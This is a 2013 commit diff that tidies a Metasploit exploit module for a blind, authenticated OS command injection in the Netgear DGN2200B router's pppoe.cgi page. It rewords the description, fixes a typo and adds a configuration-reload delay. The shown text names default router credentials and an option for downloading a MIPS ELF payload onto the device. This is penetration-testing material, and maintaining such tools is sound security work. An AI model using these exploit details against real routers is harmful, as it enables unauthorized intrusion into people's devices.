Do final cleanup for netgear_dgn2200b_pppoe_exec

jvazquez-r7 · jvazquez-r7 · commit 19a158dce9ff · 2013-04-19T15:50:23.000-05:00
diff --git a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
@@ -19,13 +19,13 @@ def initialize(info = {})
 		super(update_info(info,
 			'Name'        => 'Netgear DGN2200B pppoe.cgi Remote Command Execution',
 			'Description' => %q{
-					Some Netgear Routers are vulnerable to an authenticated OS command injection.
-				Default credentials for the web interface are admin/admin or admin/password.
-				Since it is a blind os command injection vulnerability, there is no output for the
-				executed command when using the cmd generic payload. A ping command against a
-				controlled system could be used for testing purposes.
-
-				WARNING: We overwrite parts of the PPPOE configuration! Backup it prior using this module!
+					Some Netgear Routers are vulnerable to an authenticated OS command injection
+				on their web interface. Default credentials for the web interface are admin/admin
+				or admin/password. Since it is a blind os command injection vulnerability, there
+				is no output for the executed command when using the cmd generic payload. A ping
+				command against a controlled system could be used for testing purposes. This module
+				overwrites parts of the PPOE configuration, while the module tries to restore it
+				after exploitation configuration backup is recommended.
 			},
 			'Author'      =>
 				[
@@ -71,7 +71,8 @@ def initialize(info = {})
 				OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]),
 				OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
 				OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
-				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 45])
+				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
+				OptInt.new('RELOAD_CONF_DELAY', [true, 'Time to wait to allow the remote device to load configuration', 45])
 			], self.class)
 	end
 
@@ -96,7 +97,7 @@ def grab_config(user,pass)
 			end
 			if [200, 301, 302].include?(res.code)
 				if res.body =~ /pppoe_username/
-					print_good("#{rhost}:#{rport} - Successful downloaded the configuration")
+					print_good("#{rhost}:#{rport} - Successfully downloaded the configuration")
 				else
 					fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - Download of the original configuration not possible or the device uses a configuration which is not supported")
 				end
@@ -157,7 +158,6 @@ def request(cmd,user,pass,uri)
 		#&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05
 		#&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0
 		#&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0
-
 			res = send_request_cgi(
 				{
 					'uri'	=> uri,
@@ -222,7 +222,7 @@ def exploit
 		uri = '/pppoe.cgi'
 		user = datastore['USERNAME']
 		pass = datastore['PASSWORD']
-		@timeout = datastore['HTTP_DELAY']
+		@timeout = datastore['RELOAD_CONF_DELAY']
 
 		#
 		# testing Login
